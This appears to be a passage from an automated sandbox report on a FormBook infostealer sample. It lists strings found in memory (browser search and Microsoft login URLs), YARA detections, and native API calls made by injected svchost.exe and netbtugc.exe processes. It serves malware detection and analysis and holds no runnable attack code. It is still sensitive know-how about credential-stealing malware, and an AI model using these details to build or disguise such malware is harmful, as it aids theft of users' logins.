            Source: netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000002.4192324042.00000000042F2000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000004452000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000006.00000002.4192324042.00000000042F2000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000004452000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.4190676989.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.4190676989.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000002.4190676989.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.4190676989.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000006.00000002.4190676989.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000006.00000002.4190676989.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2194361079.0000000007663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000006.00000002.4192324042.0000000003986000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rakko.cc/3sXd0gW
            Source: netbtugc.exe, 00000006.00000002.4192324042.0000000003986000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rakko.cc/46n4zu2
            Source: netbtugc.exe, 00000006.00000002.4192324042.0000000003986000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
            Source: netbtugc.exe, 00000006.00000002.4192324042.0000000003986000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
            Source: netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000006.00000002.4193895794.0000000005C40000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4192324042.0000000003FCE000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.000000000412E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.000000000412E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: netbtugc.exe, 00000006.00000002.4192324042.0000000003986000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.value-domain.com/
            Source: XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.value-domain.com/modall.php

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190493627.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2018221773.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4193347183.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4191461171.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2018302081.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4190493627.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2018221773.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4193347183.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4191461171.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2018302081.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: 8htbxM8GPX.exe, 00000000.00000000.1712278709.0000000001052000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4ea52f5f-a
            Source: 8htbxM8GPX.exe, 00000000.00000000.1712278709.0000000001052000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_09dc4f05-1
            Source: 8htbxM8GPX.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_443d0a59-d
            Source: 8htbxM8GPX.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3132e22e-8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042B363 NtClose,1_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A735C0 NtCreateMutant,LdrInitializeThunk,1_2_03A735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72B60 NtClose,LdrInitializeThunk,1_2_03A72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03A72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03A72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A74340 NtSetContextThread,1_2_03A74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73090 NtSetValueKey,1_2_03A73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73010 NtOpenDirectoryObject,1_2_03A73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A74650 NtSuspendThread,1_2_03A74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BA0 NtEnumerateValueKey,1_2_03A72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72B80 NtQueryInformationFile,1_2_03A72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BE0 NtQueryValueKey,1_2_03A72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BF0 NtAllocateVirtualMemory,1_2_03A72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AB0 NtWaitForSingleObject,1_2_03A72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AF0 NtWriteFile,1_2_03A72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AD0 NtReadFile,1_2_03A72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A739B0 NtGetContextThread,1_2_03A739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FA0 NtQuerySection,1_2_03A72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FB0 NtResumeThread,1_2_03A72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F90 NtProtectVirtualMemory,1_2_03A72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FE0 NtCreateFile,1_2_03A72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F30 NtCreateSection,1_2_03A72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F60 NtCreateProcessEx,1_2_03A72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72EA0 NtAdjustPrivilegesToken,1_2_03A72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72E80 NtReadVirtualMemory,1_2_03A72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72EE0 NtQueueApcThread,1_2_03A72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72E30 NtWriteVirtualMemory,1_2_03A72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DB0 NtEnumerateKey,1_2_03A72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DD0 NtDelayExecution,1_2_03A72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D30 NtUnmapViewOfSection,1_2_03A72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D00 NtSetInformationFile,1_2_03A72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D10 NtMapViewOfSection,1_2_03A72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73D10 NtOpenProcessToken,1_2_03A73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73D70 NtOpenThread,1_2_03A73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CA0 NtQueryInformationToken,1_2_03A72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CF0 NtOpenProcess,1_2_03A72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CC0 NtQueryVirtualMemory,1_2_03A72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C00 NtQueryInformationProcess,1_2_03A72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C60 NtCreateKey,1_2_03A72C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E54340 NtSetContextThread,LdrInitializeThunk,6_2_02E54340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E54650 NtSuspendThread,LdrInitializeThunk,6_2_02E54650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E535C0 NtCreateMutant,LdrInitializeThunk,6_2_02E535C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52AF0 NtWriteFile,LdrInitializeThunk,6_2_02E52AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52AD0 NtReadFile,LdrInitializeThunk,6_2_02E52AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02E52BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02E52BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02E52BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52B60 NtClose,LdrInitializeThunk,6_2_02E52B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E539B0 NtGetContextThread,LdrInitializeThunk,6_2_02E539B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02E52EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02E52E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52FE0 NtCreateFile,LdrInitializeThunk,6_2_02E52FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52FB0 NtResumeThread,LdrInitializeThunk,6_2_02E52FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52F30 NtCreateSection,LdrInitializeThunk,6_2_02E52F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02E52CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52C60 NtCreateKey,LdrInitializeThunk,6_2_02E52C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02E52C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02E52DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52DD0 NtDelayExecution,LdrInitializeThunk,6_2_02E52DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02E52D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02E52D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E53090 NtSetValueKey,6_2_02E53090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E53010 NtOpenDirectoryObject,6_2_02E53010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52AB0 NtWaitForSingleObject,6_2_02E52AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52B80 NtQueryInformationFile,6_2_02E52B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52EA0 NtAdjustPrivilegesToken,6_2_02E52EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52E30 NtWriteVirtualMemory,6_2_02E52E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52FA0 NtQuerySection,6_2_02E52FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52F90 NtProtectVirtualMemory,6_2_02E52F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52F60 NtCreateProcessEx,6_2_02E52F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52CF0 NtOpenProcess,6_2_02E52CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52CC0 NtQueryVirtualMemory,6_2_02E52CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52C00 NtQueryInformationProcess,6_2_02E52C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52DB0 NtEnumerateKey,6_2_02E52DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E53D70 NtOpenThread,6_2_02E53D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E52D00 NtSetInformationFile,6_2_02E52D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E53D10 NtOpenProcessToken,6_2_02E53D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00437920 NtCreateFile,6_2_00437920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00437A70 NtReadFile,6_2_00437A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00437B50 NtDeleteFile,6_2_00437B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00437BE0 NtClose,6_2_00437BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00437D30 NtAllocateVirtualMemory,6_2_00437D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168711_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168731_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028A01_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101731_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011101_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E1F31_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012901_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004035001_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040268A1_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026981_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026A01_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF4A1_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D7531_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF531_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A8739A1_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F01_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B003E61_2_03B003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF132D1_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2D34C1_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA3521_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A452A01_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5D2F01_2_03A5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C01_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE02741_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4B1B01_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B001AA1_2_03B001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF81CC1_2_03AF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A301001_2_03A30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA1181_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7516C1_2_03A7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F1721_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0B16B1_2_03B0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF70E91_2_03AF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFF0E01_2_03AFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEF0CC1_2_03AEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C01_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFF7B01_2_03AFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3C7C01_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A407701_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A647501_2_03A64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5C6E01_2_03A5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF16CC1_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADD5B01_2_03ADD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B005911_2_03B00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A405351_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF75711_2_03AF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEE4F61_2_03AEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFF43F1_2_03AFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A314601_2_03A31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF24461_2_03AF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5FB801_2_03A5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB5BF01_2_03AB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7DBF91_2_03A7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF6BD71_2_03AF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFB761_2_03AFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFAB401_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADDAAC1_2_03ADDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A85AA01_2_03A85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA801_2_03A3EA80
